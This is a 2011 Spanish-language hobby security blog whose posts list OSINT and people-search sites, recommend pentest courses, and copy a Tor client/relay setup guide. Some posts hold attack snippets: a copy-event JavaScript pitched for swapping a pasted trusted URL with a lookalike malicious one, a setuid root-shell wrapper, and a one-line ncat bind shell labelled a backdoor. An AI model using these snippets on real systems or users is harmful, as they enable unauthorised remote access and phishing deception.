martes, 22 de noviembre de 2011

Mas online tools

En otra entrada ya puse una serie de direcciones web con herramientas online muy interesantes para ocultar la ip, ahora añado mas direcciones con utilidades online sacadas de la guia "BackTrack 4: Assuring Security
by Penetration Testing. Master the art of penetration testing with BackTrack"
de Shakeel Ali y Tedi Heriyanto.

http://www.archive.org - Archivo de websites.
http://www.domaintools.com/ - Herramientas sobre dominios.
http://www.alexa.com/ - Conocida base de datos con informacion sobre websites.
http://serversniff.net/ - La "Swiss Army Knife" para networking, serverchecks y routing.
http://centralops.net/ - Utilidades online gratuitas sobre dominios, e-mail, ping, traceroute, Whois, and mucho mas.
http://www.robtex.com - Buscador de información de dominios y redes.
http://www.pipl.com/ - Buscador de personas online.
http://yoname.com - Buscador de personas en redes sociales y blogs.
http://wink.com/ - Buscador gratuito de personas en la red.
http://www.isearch.com/ - Otro buscador de personas en la red.
http://www.tineye.com Buscador de información de imagenes en la red.

lunes, 10 de octubre de 2011

Curso de seguridad de redes wireless por Securitytube

Securitytube tiene en su web un curso sobre seguridad y tests de penetracion en redes wifi. Son mas de 12 horas de video que forman parte de un curso libre y gratuito que ofrecen con la posibilidad realizar un examen practico y conseguir la certificacion SWSE: The SecurityTube Wi-Fi Security Expert.

martes, 4 de octubre de 2011

Videos BT5

La Organizacion Mexicana de Hacking Etico esta subiendo a su web una serie de videos sobre Backtrack 5. Aunque el proyecto lleva tiempo estancado, tienen planeado llegar a los veinte videos, ya se puede aprender y disfrutar de los siete primeros que empiezan desde lo mas basico, como son los comandos en la shell de linux, hasta cacharrear con metasploit y la distro metasploitable esta ultima configurada para realizar practicas. http://www.backtrack5.omhe.org/

Securitytube

Securitytube es el youtube de la seguridad informatica. Multiples videos sobre seguridad informatica que se actualiza todos los dias varias veces con lo ultimo en la red.

Mundo Hacker

Mundo Hacker es un programa que se emite todos los primeros lunes de mes en globbtv. Colaboran grandes profesionales de la seguridad informatica y tiene una seccion muy interesante llamada Welcome to the real world en la que se exponen tecnicas y herramientas en una pratica. Para aprender de forma amena y divertida, descansando de los papers. Muy recomendable.

Enciclopedia visual de seguridad de la informacion.

Criptored esta publicando una serie de videos educativos sobre seguridad de la informacion que van desde criptografia basica hasta analisis y gestion de riesgos que es el ultimo publicado. http://www.criptored.upm.es/intypedia/index.php?lang=es

jueves, 1 de septiembre de 2011

Estandar para la ejecucion de Test de Penetracion

Un grupo de expertos profesionales de la seguridad informatica ha creado "Penetration Testing Execution Standard" .

En su web se puede encontrar informacion sobre las herramientas y acciones que se realizan en una pentest.

martes, 30 de agosto de 2011

La Navaja Suiza de Internet

Si Netcat es la navaja suiza de las redes tcp/ip robtex.com se presenta como la navaja suiza de Internet, mas específicamente de los dominios y mapeo de la misma.


Nos proporciona información de las redes, rutas, servidores, DNS, país, así como las ips y dominios relacionados, además de muchos más datos que obtendremos a partir tan solo de una ip o un nombre de dominio. También si esta en alguna lista negra y dominios parecidos que están en venta y su precio.

Parte de la información es proporcionada por otras fuentes de Internet como Alexa, Sedo, radb . Una buena herramienta para empezar a buscar información sobre un sitio de Internet.

miércoles, 17 de agosto de 2011

Codigo para modificar texto copiado al pegarlo

Este código de javascript hará que se añada un texto antes y después del texto copiado de nuestra web.


<script type="text/javascript">

function addLink() {

    var body_element = document.getElementsByTagName('body')[0];

    var selection;

    selection = window.getSelection();

    var pagelinkdespues= "Este mensaje esta despues del texto copiado";

    var pagelinkantes = "Este mensaje esta antes del texto copiado";

    var copytext = pagelinkantes + selection+ pagelinkdespues;

    var newdiv = document.createElement('div');

    newdiv.style.position='absolute';

    newdiv.style.left='-99999px';

    body_element.appendChild(newdiv);

    newdiv.innerHTML = copytext;

    selection.selectAllChildren(newdiv);

    window.setTimeout(function() {

    body_element.removeChild(newdiv);

    },0);

}

document.oncopy = addLink;

</script>



Aparte de por ejemplo añadir un mensaje de copyrigth al final de cada texto copiado/pegado surgen algunas posibilidades mas como hacer creer a alguien que no funciona el link en un mail o una web que enlaza con una pagina web y aparece el tipico mensaje avisando que si no funciona el link copie y pegue la URL a su navegador. La víctima piensa que ha copiado una URL de confianza (http://www.google.com) pero al pegarla en el navegador para conectarse a ella la dirección URL es la que nosotros hemos añadido al código javascript. Si además es parecida a la dirección de confianza (htttp://www.gooogle.com o http://gooie.com) (si son ejemplos muy tontos, pero son eso ejemplos) no comprobara letra a letra que no es la web que quería visitar y se conectara sin saberlo a la web maliciosa que tengamos diseñada para continuar con el engaño.


Código sacado de http://spirate.net/foro/tutoriales-de-ayuda/anade-mensaje-a-la-hora-de-que-copien-algo-de-tu-web/?action=printpage despues de investigar el texto de Copyright añadido al copiar/pegar en la web http://papilyn.com/ .

jueves, 4 de agosto de 2011

pequeño codigo para pequeños stoor

:~/$cat > shell.c # codigo
main(){
setuid(0);
setgid(0);
system("/bin/bash");

:~/$ gcc -o shell shell.c # compilacion

:~/$ sudo ./shell # ejecucion
Password:
:~/Desktop#
:~/Desktop# whoami # comprobacion
root


copiado de http://zodiac-mitm.blogspot.com/

Ncat backdoor

ncat --exec "/bin/bash" -l 8081 --keep-open &


Más usos de esta hermosa herramienta en el tutorial de irongeek .

martes, 2 de agosto de 2011

waterroof o como configurar el firewall del Mac OS X facilmente

waterroof es una aplicacion para macos x que te permitira configurar el firewall que trae el propio sistema operativo desde una consola grafica.

lunes, 1 de agosto de 2011

OWASP Mantra el navegador para Pen Testers

OWASP Mantra es un navegador para Linux, Windows y Mac que viene con una coleccion de herramientas para los profesionales de la seguridad o para los que como yo les gusta trastear integradas en el. Tambien es una buena herramienta para diseñadores y programadores de aplicaciones web. Es muy completo y muy amplio, por defecto ya vienen instalados unos cuantos de los mejores addons para firefox llegando incluso a traer unas cuantas paginas web en la carperta de marcadores muy interesantes desde manuales hasta páginas de wargames.

viernes, 29 de julio de 2011

Configurar Tor como cliente, relay y server de terceraola.com

Este texto ha sido fusilado (copiado) integramente de http://terceraola.com/2011/02/07/configurar-tor-como-cliente-relay-y-server/


Configurar Tor como cliente, relay y server.


Saludos a todos. Voy a inaugurar este blog con un pequeño tutorial de cómo montar un nodo de Tor en vuestro ordenador.

Este manual ha sido probado en Debian (lenny, squeeze) y Ubuntu. Lo primero que hay que hacer es abrir una terminal y ganar privilegios de root:

$ sudo -i

O bien:

$ su

Una vez introducida la contraseña correcta, escribimos:

# apt-get install tor tork polipo


Donde tor es el programa en cuestion, tork es un front-end gráfico y polipo es un servidor proxy.

También podemos usar privoxy, pero da problemas que resultan en un bajo rendimiento (retardos excesivos y poco ancho de banda). En algunas distribuciones, privoxy es dependencia de tor, pero se puede desinstalar sin problemas.

# apt-get purge privoxy


Bien, lo primero que haremos sera configurar el servidor proxy. Podemos encontrar un archivo de configuración preparado para el uso de tor aquí. Sustituid el contenido de ese enlace por lo que contenga el archivo /etc/polipo/config.

# gedit /etc/polipo/config

Guardamos el archivo y reiniciamos polipo.

# /etc/init.d/polipo restart

A continuación ejecutamos tork, cuyo asistente nos facilita mucho la tarea de configurar tor.

# tork

Aparecera una ventana de bienvenida donde debemos pulsar ‘Next’. En la segunda ventana podemos elegir a qué cliente de tor conectarnos, ya que éste no tiene por qué ejecutarse en nuestro ordenador, aunque en este caso lo hace. Seleccionamos no y luego hacemos click en ‘Next’. En la siguiente ventana especificamos si tor se debe iniciar al arranque o no. Por defecto esta activado en el arranque y no veo por qué quitarlo salvo para ahorrar recursos. Hacemos click en ‘Next’. En la ventana que aparece a continuación elegimos el archivo donde guardar las opciones. Puede variar de una distro a otra, pero en Debian y Ubuntu esta en /etc/tor/torrc. Lo seleccionamos y hacemos click en ‘Modificar…’. Para asegurarnos que tor funciona, pulsad el botón ‘Tor Test’. Si nos dice que ha contactado exitosamente, hacemos click en ‘Next’. La siguiente ventana indica que hay que configurar un proxy. Es simplemente explicativa, hacemos click en ‘Next’. En la siguiente ventana nos da a elegir usar privoxy (por defecto) o cualquier otro. Elegid cualquier otro, y ‘Next’. Todos los pasos siguientes se pueden omitir, salvo que querais configurar Konqueror, lo cual se hace con un click cuando nos lo pida.

Ahora ya tenemos tor y polipo configurados, pero hay que reiniciar tor.

# /etc/init.d/tor restart

Y tan solo nos queda conectarnos a tor, dandole al Play en Tork. Para probar si funciona, debeis especificar a vuestro navegador que usais un proxy. En Firefox y similares, la opcion está en Editar / Preferencias / Avanzado / Red / Configuración… Se abre una ventana donde podeis configurar manualmente el proxy. Lo que teneis que poner es 127.0.0.1 (o localhost) y el puerto 8118.

Tambien podeis cambiar la configuracion de red del sistema para que siempre useis proxy, y no solo navegando.

Para comprobar si funciona meteos en whatsmyip.org y comprobad Que ha cambiado.

Para configurarlo como relay o como un server (para que otra gente navegue con tu IP), haced click en el boton de más opciones de Tork, y luego haced click en Ejecutar server. Tan solo hay que darle nombre al servidor y poner un email de contacto. Es posible que tengais que redireccionar algunos puertos en el router a vuestro ordenador (9001 y 9030). Solo se puede ser una de las dos cosas, o relay o server, asi que la ultima opcion decide.

Para ver que todo ha ido bien, mirad el registro. Si toda la actividad está bajo tor, habreis tenido exito. Podeis lanzar cualquier programa desde una consola usando:

$ torify

A disfrutar del anonimato!

Este texto ha sido fusilado (copiado) integramente de http://terceraola.com/2011/02/07/configurar-tor-como-cliente-relay-y-server/